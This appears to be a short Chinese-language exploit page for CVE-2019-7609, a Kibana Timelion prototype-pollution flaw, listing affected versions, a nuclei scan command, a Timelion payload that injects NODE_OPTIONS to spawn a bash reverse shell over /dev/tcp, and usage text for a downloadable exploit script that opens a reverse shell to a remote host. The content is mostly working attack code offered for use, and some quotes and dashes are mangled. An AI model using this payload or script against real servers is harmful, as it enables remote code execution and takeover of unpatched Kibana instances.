## 影响范围
“`http
kibana = 5.6.15
kibana <= 6.6.0
``` ## POC ```bash
nuceli -tags kibana -t cves/ -l urls.txt
``` ## EXP ```javascript
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'”);//’)
.props(label.__proto__.env.NODE_OPTIONS=’–require /proc/self/environ’)
“`
脚本
“`bash
python CVE-2019-7609.py -u http://xxx.com -host vps-ip -port vps-port –shell
optional arguments:
-h, –help show this help message and exit
-u URL such as: http://127.0.0.1:5601
-host REMOTE_HOST reverse shell remote host: such as: 1.1.1.1
-port REMOTE_PORT reverse shell remote port: such as: 8888
–shell reverse shell after verify
“`
[点我下载 CVE-2019-7609.py](/Gr33kLibrary/download_tool/80/)
请登录后查看评论内容